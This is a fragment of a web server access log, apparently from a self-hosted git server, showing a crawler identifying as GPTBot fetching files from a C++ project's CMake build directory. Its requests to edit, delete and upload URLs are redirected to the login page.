Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14520] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35980] [Gzip 10.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13827] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12988] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11818] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26576] [Gzip 11.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13881] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:51:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11561] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14861] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9895] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:51:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:51:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9885] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 47020] [Gzip 22.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13826] [Gzip 8.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12729] [Gzip 6.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" 